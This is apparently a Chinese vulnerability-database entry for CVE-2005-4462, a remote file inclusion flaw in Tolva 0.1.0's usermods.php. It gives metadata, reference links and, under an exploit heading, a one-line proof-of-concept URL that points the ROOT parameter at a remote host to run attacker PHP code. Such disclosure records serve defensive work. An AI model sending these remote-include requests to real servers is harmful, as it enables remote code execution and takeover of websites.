Tolva Usermods.PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109544 漏洞类型 输入验证
发布时间 2005-12-21 更新时间 2007-07-06
CVE编号 CVE-2005-4462 CNNVD-ID CNNVD-200512-501
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26921
https://www.securityfocus.com/bid/16000
https://cxsecurity.com/issue/WLB-2005120066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-501
|漏洞详情
TolvaPHPwebsitesystem0.1.0中的usermods.php存在PHP远程文件包含漏洞,远程攻击者可以通过ROOT参数内的URL执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/16000/info

Tolva is prone to a remote file-include vulnerability.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/twebs/modules/misc/usermods.php?ROOT=http://www.example.com
|受影响的产品
Tolva Tolva 0.1 .0
|参考资料

来源:BID
名称:16000
链接:http://www.securityfocus.com/bid/16000
来源:BUGTRAQ
名称:20051221TolvaPHPwebsitesystemRemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/419992/100/0/threaded
来源:SREASON
名称:288
链接:http://securityreason.com/securityalert/288